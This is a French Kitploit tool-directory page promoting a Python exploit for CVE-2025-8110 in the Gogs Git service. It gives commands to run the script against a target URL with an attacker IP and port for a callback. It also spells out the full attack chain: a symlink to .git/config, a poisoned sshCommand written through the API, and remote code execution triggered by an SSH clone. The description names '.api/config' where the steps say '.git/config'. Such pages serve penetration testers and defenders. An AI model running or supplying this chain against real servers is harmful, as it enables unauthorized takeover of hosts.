Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2025-8110-GOGS-RCE — GOGS RCE cve-2025-8110 script Python qui automatise toute la chaîne d'attaque : création d'un dépôt avec un fichier de lien symbolique pointant vers .git/config, puis déclenchement d'une RCE via une commande sshCommand empoisonnée sur le fichier de configuration. | Kitploit
Outils/GitHubGitHub/kayl22/cve-2025-8110-gogs-rce
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleRed TeamingDéveloppement de Charges Utiles
GitHubkayl22/cve-2025-8110-gogs-rce

cve-2025-8110-GOGS-RCE

GOGS RCE cve-2025-8110 script Python qui automatise toute la chaîne d'attaque : création d'un dépôt avec un fichier de lien symbolique pointant vers .git/config, puis déclenchement d'une RCE via une commande sshCommand empoisonnée sur le fichier de configuration.

Voir le dépôt
4il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

GOGS RCE cve-2025-8110

Gogs est un service Git léger et auto-hébergé, similaire à une version privée de GitHub, conçu pour fonctionner facilement sur des serveurs à faible ressources. La vulnérabilité CVE-2025-8110 est une faille de sécurité critique qui permet à un attaquant de contourner les restrictions de chemin en utilisant des liens symboliques. En téléchargeant un lien malveillant pointant vers .api/config, un attaquant peut utiliser l'API Gogs pour intégrer un fichier de configuration malveillant avec le paramètre sshCommand et exécuter du code à distance (RCE) sur le serveur hôte.



Utilisation

  1. Clonez ce dépôt sur votre machine locale :
root@kitploit:~
git clone https://github.com/kayl22/cve-2025-8110-GOGS-RCE
cd ./cve-2025-8110-GOGS-RCE

  1. Installez toutes les dépendances
root@kitploit:~
pip3 install -r ./requirements.txt

  1. Exécutez le script
root@kitploit:~
# Print help
python3 ./cve-2025-8110.py --help

# Execute the attack chain with register step
python3 ./cve-2025-8110.py --url http://<host> -lh <attacker-ip> -lp <attacker-port>

# Execute the attack chain skipping register | useful when register func returns err statement
python3 ./cve-2025-8110.py --url http://<host> -lh <attacker-ip> -lp <attacker-port> -U <username> -P <password>


Comment ça fonctionne

Ce script suit une chaîne d'attaque impliquant les étapes suivantes :

root@kitploit:~
1. Register & authenticate a throwaway account (Register skipped if creds are provided with -U and -P flags)
2. Obtain an API bearer token
3. Create an auto-initialised repository
4. Clone the repo locally and push a relative symlink  malicious_link -> .git/config
5. PUT the malicious git config (with sshCommand) through the symlink via the PutContents API
6. Trigger the sshCommand by cloning the repo over SSH

Crédits

Ce script a été réalisé en utilisant le PoC de zAbuQasem (https://github.com/zAbuQasem)

Télécharger l’outil